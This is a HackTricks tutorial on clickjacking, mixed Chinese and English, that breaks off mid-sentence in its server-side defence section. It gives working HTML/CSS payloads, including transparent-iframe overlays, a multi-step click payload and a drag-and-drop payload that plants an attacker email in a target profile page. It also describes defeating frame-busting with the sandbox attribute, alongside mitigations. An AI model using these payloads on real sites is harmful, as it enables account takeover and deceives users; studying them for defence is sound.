HackTricksClickjacking
Reading time: 11 minutes
tip
学习和实践 AWS 黑客技术:
HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:
HackTricks Training GCP Red Team Expert (GRTE)
学习和实践 Azure 黑客技术:
HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
什么是 Clickjacking
在一次 clickjacking 攻击中,用户被诱导去点击网页上的一个元素,该元素要么是不可见的,要么被伪装成另一个元素。 这种操纵可能导致用户遭受意想不到的后果,例如下载 malware、被重定向到恶意网页、提供凭证或敏感信息、转账,或在线购买商品。
预填表单技巧
有时可以在加载页面时通过 GET 参数填充表单字段的值。攻击者可能滥用此行为,用任意数据填充表单并发送 clickjacking payload,从而让用户按下 Submit 按钮。
使用 Drag&Drop 填充表单
如果你需要用户填写表单,但又不想直接要求他输入某些特定信息(例如你已知的 email 或特定密码),你可以要求他Drag&Drop 某些东西,来写入你控制的数据,像 这个示例 中所示。
基本 Payload
<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>
多步骤有效载荷
<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>
拖放 + 点击 payload
<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>
XSS + Clickjacking
If you have identified an 需要用户点击才能触发的 XSS 攻击 on some element to 触发 the XSS and the page is 容易受到 Clickjacking 攻击, you could abuse it to trick the user into clicking the button/link.
Example:
You found a self XSS in some private details of the account (details that 只有你可以设置和读取). The page with the form to set these details is 易受攻击 to Clickjacking and you can 预填充 the form with the GET parameters.
An attacker could prepare a Clickjacking attack to that page 预填充 the form with the XSS payload and 欺骗 the user into 提交 the form. So, 当表单被提交时 and the values are modified, the user 将执行 XSS.
DoubleClickjacking
Firstly explained in this post, this technique would ask the victim to double click on a button of a custom page placed in a specific location, and use the timing differences between mousedown and onclick events to load the victim page duing the double click so the 受害者实际上点击了受害者页面中的合法按钮。
An example could be seen in this video: https://www.youtube.com/watch?v=4rGvRRMrD18
A code example can be found in this page.
warning
This technique allows to trick the user to click on 1 place in the victim page bypassing every protection against clickjacking. So the attacker needs to find 敏感操作可以通过一次点击完成的情况,例如 OAuth 提示接受权限。
浏览器扩展: DOM-based autofill clickjacking
Aside from iframing victim pages, attackers can target browser extension UI elements that are injected into the page. Password managers render autofill dropdowns near focused inputs; by focusing an attacker-controlled field and hiding/occluding the extension’s dropdown (opacity/overlay/top-layer tricks), a coerced user click can select a stored item and fill sensitive data into attacker-controlled inputs. This variant requires no iframe exposure and works entirely via DOM/CSS manipulation.
- For concrete techniques and PoCs see:
Strategies to Mitigate Clickjacking
客户端防御
客户端执行的脚本可以采取以下措施来防止 Clickjacking:
- 确保应用窗口是主窗口或顶层窗口。
- 使所有框架可见。
- 防止对不可见框架的点击。
- 检测并向用户提示潜在的 Clickjacking 尝试。
然而,这些 frame-busting 脚本可能被规避:
- 浏览器安全设置: 某些浏览器可能基于其安全设置或缺乏 JavaScript 支持而阻止这些脚本。
- HTML5 iframe sandbox Attribute: 攻击者可以通过设置 sandbox 属性为 allow-forms 或 allow-scripts(但不包含 allow-top-navigation)来使 frame buster 脚本失效。这会阻止 iframe 验证其是否为顶层窗口,例如,
<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>
The allow-forms and allow-scripts values enable actions within the iframe while disabling top-level navigation. To ensure the intended functionality of the targeted site, additional permissions like allow-same-origin and allow-modals might be necessary, depending on the attack type. Browser console messages can guide which permissions to allow.
服务器端防御
X-Frame-Options
X-Frame-Options HTTP response header 告知浏览器在 或